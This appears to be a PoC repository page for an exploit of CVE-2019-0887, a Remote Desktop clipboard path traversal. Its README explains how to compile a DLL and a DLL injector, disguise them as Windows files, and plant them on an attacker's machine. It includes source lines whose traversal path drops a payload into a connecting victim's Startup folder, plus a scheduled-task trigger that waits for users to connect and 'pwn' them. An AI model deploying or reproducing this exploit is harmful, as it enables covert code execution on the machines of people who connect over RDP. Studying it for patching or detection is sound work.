来源

关联漏洞

Description

exp for CVE-2019-0887

介绍

# CVE-2019-0887

Compile the CVE-2019-0887, rename to `winhlp.dll`

Compile the Install_Hook, rename to `hook.exe`

> be careful, they must be compile with x64

Put then into the evil system just like that
```bash
c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # something evil 
```

if somebody want to change the path, there is the point
```bash
# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
```

Maybe use taskschd.msc to create a Task Plan, set a Trigger "On connection to user session" and set the filepath of hook.exe.

Waiting some guys connect to my evil system, copy something, and pwn...

> Tips: Why not use DLL hijack?

文件快照

 [4.0K]  /data/pocs/f35b6f67fd5997a81eadc291ef57197236fcadbb
├── [4.0K]  CVE-2019-0887
│   ├── [4.0K]  CVE-2019-0887
│   │   ├── [8.9K]  CVE-2019-0887.vcxproj
│   │   ├── [1.3K]  CVE-2019-0887.vcxproj.filters
│   │   ├── [6.1K]  dllmain.cpp
│   │   ├── [ 154]  framework.h
│   │   ├── [ 161]  packages.config
│   │   ├── [ 153]  pch.cpp
│   │   └── [ 531]  pch.h
│   └── [1.4K]  CVE-2019-0887.sln
├── [4.0K]  Install_Hook
│   └── [4.0K]  ConsoleApplication
│       ├── [4.0K]  ConsoleApplication
│       │   ├── [2.5K]  ConsoleApplication.cpp
│       │   ├── [7.0K]  ConsoleApplication.vcxproj
│       │   └── [ 991]  ConsoleApplication.vcxproj.filters
│       └── [1.4K]  ConsoleApplication.sln
├── [1.0K]  LICENSE
└── [ 913]  README.md

5 directories, 14 files

备注